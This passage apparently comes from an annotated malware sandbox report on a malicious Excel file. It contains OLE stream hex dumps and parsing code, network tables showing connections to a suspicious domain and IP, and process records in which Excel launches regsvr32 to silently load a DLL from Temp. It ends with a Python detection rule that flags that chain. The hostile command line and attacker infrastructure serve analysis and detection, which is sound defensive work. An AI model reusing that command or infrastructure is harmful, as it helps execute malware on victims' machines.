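    "54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 "
    "6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f "
    "64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00")
COMPOBJ_MULTIPAGE_HEX = (
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 "
    "00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 "
    "6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 "
    "61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00")
COMPOBJ_USERFORM_HEX = (
    "01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 "
    "00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 "
    "6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 "
    "00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00")


def from_dump(hexdump):
    """Turn a space-separated 'Data Raw' line back into bytes."""
    return bytes.fromhex(hexdump)


def shannon_entropy(data):
    """Entropy in bits per byte, the quantity shown in the report's 'Entropy' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def _ansi_string(buf, off):
    """LengthPrefixedAnsiString: u32 length (includes the NUL) followed by the bytes."""
    length = int.from_bytes(buf[off:off + 4], "little")
    off += 4
    return buf[off:off + length].rstrip(b"\x00").decode("latin-1"), off + length


def parse_compobj(buf):
    """CLSID, user type, clipboard format and ProgID of a \\x01CompObj stream (MS-OLEDS 2.3.8)."""
    if len(buf) < 28 or buf[:4] != b"\x01\x00\xfe\xff":
        raise ValueError("not a CompObj stream")
    clsid = "{%s}" % str(uuid.UUID(bytes_le=bytes(buf[12:28]))).upper()
    user_type, off = _ansi_string(buf, 28)
    marker = int.from_bytes(buf[off:off + 4], "little")
    if marker == 0:                               # no clipboard format recorded
        clip, off = None, off + 4
    elif marker in (0xFFFFFFFF, 0xFFFFFFFE):      # numeric clipboard format id follows
        clip = "format 0x%08x" % int.from_bytes(buf[off + 4:off + 8], "little")
        off += 8
    else:                                         # otherwise it is a length-prefixed string
        clip, off = _ansi_string(buf, off)
    progid, off = _ansi_string(buf, off)          # "Reserved1" in the spec, ProgID in practice
    return {"clsid": clsid, "user_type": user_type, "clipboard_format": clip, "progid": progid}
```

The PROJECTwm bytes give back the 3.2445545… the report prints, so the field is plain Shannon entropy over the raw stream. The first CompObj decodes to {46E31370-3F7A-11CE-BED6-00AA00611080} / Forms.MultiPage.1 and the i02 and i03 copies to {C62A69F0-16DC-11CE-9E98-00AA00574A4F} / Forms.Form.1, the MSForms UserForm: the second OLE container holds a form with a MultiPage control, not a VBA project, which is why its indicator block reports Contains VBA Macros:False.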

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2021 18:28:00.002847910 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.125716925 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.125803947 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.138995886 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.262025118 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.263251066 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.263308048 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.264287949 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.265647888 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.387058973 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.388211012 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.388309956 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.389369965 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.512084007 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.512468100 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.512512922 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.512586117 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.512613058 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.526820898 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.527962923 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.649553061 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.650635004 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.650715113 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.651102066 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150
Jan 11, 2021 18:28:00.773710012 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22
Jan 11, 2021 18:28:00.773785114 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150

                      UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2021 18:27:59.845685959 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 18:27:59.992686987 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 18:28:36.852425098 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 18:28:36.900594950 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 18:28:36.939555883 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 18:28:36.987488985 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 18:28:38.115564108 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 18:28:38.163610935 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 18:28:38.174900055 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 18:28:38.225476980 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 18:28:38.506975889 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 18:28:38.555064917 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 11, 2021 18:28:38.562401056 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 11, 2021 18:28:38.610411882 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22

                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 11, 2021 18:27:59.845685959 CET | 192.168.2.22 | 8.8.8.8 | 0x26d4 | Standard query (0) | ppdb-legacy.man1lamongan.com | A (IP address) | IN (0x0001)

                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 11, 2021 18:27:59.992686987 CET | 8.8.8.8 | 192.168.2.22 | 0x26d4 | No error (0) | ppdb-legacy.man1lamongan.com | | 199.59.242.150 | A (IP address) | IN (0x0001)
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | cdn.digicertcdn.com | | 104.18.10.39 | A (IP address) | IN (0x0001)
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | cdn.digicertcdn.com | | 104.18.11.39 | A (IP address) | IN (0x0001)
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | cdn.digicertcdn.com | | 104.18.11.39 | A (IP address) | IN (0x0001)
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | cdn.digicertcdn.com | | 104.18.10.39 | A (IP address) | IN (0x0001)

The address returned for ppdb-legacy.man1lamongan.com, 199.59.242.150, is the destination of every TCP connection in the capture (three client ports, 49167 to 49169, all to port 443). The cdn.digicertcdn.com answers arrive roughly 38 seconds later and are the only other lookups the report resolves, although the UDP table shows seven query/response pairs in total.

                      Behavior

                      System Behavior

                      General

                      Start time:18:27:41
                      Start date:11/01/2021
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Imagebase:0x13f530000
                      File size:27641504 bytes
                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:18:27:48
                      Start date:11/01/2021
                      Path:C:\Windows\System32\regsvr32.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll.
                      Imagebase:0xffe30000
                      File size:19456 bytes
                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:18:28:06
                      Start date:11/01/2021
                      Path:C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948
                      Imagebase:0x13f3f0000
                      File size:995024 bytes
                      MD5 hash:45A078B2967E0797360A2D4434C41DB4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:18:28:06
                      Start date:11/01/2021
                      Path:C:\Windows\System32\DWWIN.EXE
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\dwwin.exe -x -s 1948
                      Imagebase:0xff840000
                      File size:152576 bytes
                      MD5 hash:25247E3C4E7A7A73BAEEA6C0008952B1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
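The regsvr32 record above is the event a detection engineer writes a rule for: an Office process spawning regsvr32 with a DLL under the user's Temp directory. One detail matters for matching: the path on the command line ends in a period (`fhmhkjo.dll.`). Win32 path normalisation strips trailing dots and spaces from the final component, so regsvr32 loads fhmhkjo.dll, but a rule that matches the literal string `.dll` at the end of the command line, or compares the argument against the on-disk path, misses it. The Python below is an added example, not the sandbox's or any vendor's rule; the process records are constructed from the command lines listed in this section, and the parent-image field is an assumption made for the example.

```python
"""Flag regsvr32 launched by an Office process with a DLL from a user-writable path.

Added example, not part of the sandbox report. The records below are
constructed: the command lines are the ones listed under System Behavior,
the parent-image field is an assumption made for the example.
"""
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_LIKE = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
              "cscript.exe", "cmd.exe", "powershell.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\")

# Constructed process-creation records; "parent" is assumed for the example.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll."},
    {"parent": r"C:\Windows\explorer.exe",                  # benign control case
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\mshtml.dll"},
    {"parent": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE",
     "cmdline": r"'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948"},
]

# A token is a "..." group, a '...' group (the report's rendering), or a bare word.
_TOKEN = re.compile("\"[^\"]*\"|'[^']*'|\\S+")


def split_cmdline(cmdline):
    """Tokenise a Windows command line, honouring both quote styles, and drop the quotes."""
    return [t.strip("\"'") for t in _TOKEN.findall(cmdline)]


def normalize_path(path):
    """Approximate Win32 normalisation: drop trailing dots/spaces from the last
    component (so 'fhmhkjo.dll.' becomes 'fhmhkjo.dll') and lower-case for comparison."""
    head, tail = ntpath.split(path.strip("\"'"))
    return ntpath.join(head, tail.rstrip(". ")).lower()


def regsvr32_dll(cmdline):
    """First non-switch argument of a regsvr32 command line, normalised; None if absent."""
    for arg in split_cmdline(cmdline)[1:]:
        if not arg.startswith(("-", "/")):
            return normalize_path(arg)
    return None


def evaluate(event):
    """Return the detection reasons that apply to one process-creation record."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    reasons = []
    if parent in OFFICE_IMAGES and image in SHELL_LIKE:
        reasons.append("office_spawns_" + image[:-4])
    if image == "regsvr32.exe":
        dll = regsvr32_dll(event["cmdline"])
        if dll and any(marker in dll for marker in USER_WRITABLE):
            reasons.append("regsvr32_loads_dll_from_user_writable_path")
    return reasons
```

Run over the three records, only the first one fires, on both counts (Office parent spawning regsvr32, and a DLL under AppData\Local\Temp); the explorer-launched `regsvr32 /s` of a System32 DLL and the DW20.EXE crash reporter that Excel also spawned stay quiet. Normalising the argument before the path test is what keeps the trailing-dot variant from slipping past the second check.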
